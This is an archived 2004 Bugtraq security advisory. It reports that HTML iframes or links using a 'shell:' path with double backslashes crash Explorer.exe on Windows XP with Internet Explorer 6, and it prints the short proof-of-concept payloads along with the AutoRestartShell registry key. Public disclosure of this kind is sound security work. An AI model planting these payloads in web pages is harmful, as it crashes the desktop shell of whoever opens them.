lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <000501c40dd7$d8006210$cb4db350@fucku>
Date: Fri, 19 Mar 2004 19:30:16 +0200
From: "Rafel Ivgi, The-Insider" <theinsider@....net.il>
To: "bugtraq" <bugtraq@...urityfocus.com>
Subject: Internet Explorer Causing Explorer.exe - Null Pointer Crash


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Application:     Internet Explorer & Explorer.exe
Vendors:           http://www.microsoft.com
Versions:          Windows Xp Professional & Internet Explorer
6.0.2600.0000.xpclnt_qfe.021108-2107
Patched With:  Q330994; Q822925; Q828750; Q824145;
Platforms:         WindowsXp
Bug:                   Internet Explorer Causing Explorer.exe - Null Pointer
Crash
Risk:                  Medium -  D.O.S
Exploitation:     Remote with browser
Date:                  19 Mar 2004
Author:             Rafel Ivgi, The-Insider
e-mail:                the_insider@...l.com
web:                   http://theinsider.deep-ice.com

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

WindowsXp is currently the most common operating system in the world.
This product must be as safe as it is common.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

======
2) Bug
======

Lately a new function was discovered : "shell:". This function allows
running some
new functions remotley. There is a bug in Explorer.exe when accessing a
filename
with double backslash.

For Example accessing any of the html tags below, will cause explorer to
crash.
<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

Explorer.exe crashes when using "\\".
"\" doesn't crash it and even %5C%5C doesn't crash it.

There is a registery key which is turned on by default. This key
automatically restarts
"Explorer.exe". If this key is set to "0", Explorer.exe will not restart.

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoRestartShell"=dword:00000001

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

<iframe src=shell:windows\\system32\\calc.exe></iframe>
Or
<a href=shell:windows\\system32\\calc.exe></a>
Or
Paste at [Start Menu]-->[Run] --> shell:windows\\system32\\calc.exe

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- 
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Things that are unlikeable, are NOT impossible."



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ